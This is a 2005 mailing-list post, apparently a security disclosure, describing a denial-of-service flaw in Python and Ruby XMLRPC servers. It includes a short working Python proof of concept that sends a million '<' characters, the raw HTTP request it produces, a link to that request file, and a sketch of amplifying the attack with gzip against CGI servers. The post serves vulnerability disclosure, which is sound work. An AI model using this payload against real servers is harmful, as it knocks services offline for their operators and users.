[<prev] [next>] [day] [month] [year] [list]
Message-ID: <e5312d6a050416085130a2abf@mail.gmail.com>
Date: Sat Apr 16 16:51:12 2005
From: divzero at gmail.com (Rudolf Polzer)
Subject: [DoS] XMLRPC and handling of >
This simple Python code seems to be successful at DoSing any Python or
Ruby XMLRPC server:
import xmlrpclib
s = xmlrpclib.server("http://127.0.0.1:8001/RPC2")
s.cancel("<" * 1000000)
This sends about four megabytes of data, the server however takes very
long to handle it. The Ruby server I tried this on is still running at
full CPU load; it first grew to 120MB in size, but still consumes CPU
load without end. Probably it will be done in a day or two.
A comparable Python SimpleXMLRPCServer eats 500MB of RAM and gets
killed by the ulimits I set up here. On university who don't have such
limits but 512MB of RAM and 1024MB of swap, it starts swapping and
swapping and eventually gets killed by the kernel.
The request, to be downloaded from
http://t.div0.ccc-offenbach.org/xmlrpc.http.bz2 (below one kilobyte),
does nothing more than
POST /RPC2 HTTP/1.0
Host: localhost
Connection: close
Content-Type: text/xml
Content-Length: 4000150
<?xml version='1.0'?>
<methodCall>
<methodName>cancel</methodName>
<params>
<param>
<value><string><<<.......................<</string></value>
</param>
</params>
</methodcall>
As you see, the problem seems to be the handling of the entities.
Now this is bad when using a standalone XMLRPC server, but requests
have to be quite large to exploit it (4MB this time). However, imagine
an XMLRPC server supporting Content-Transfer-Encoding: gzip. For
example one running as a CGI in Apache. Now that you are imagining
that, it shouldn't be hard any more to imagine hundreds, thousands of
such CGIs running (that's easy to do since the gzipped request is
about four kilobytes). What do we have now?
Right, the equivalent of the malloc-fork-and-touch bomb.
Is there ANY XMLRPC implementation NOT vulnerable to this rather
simple DoS attack (and be it an ugly workaround, like a memory limit
for the parser and returning "HTTP/1.0 500 Internal Server Error" if
exceeded)?
Powered by blists - more mailing lists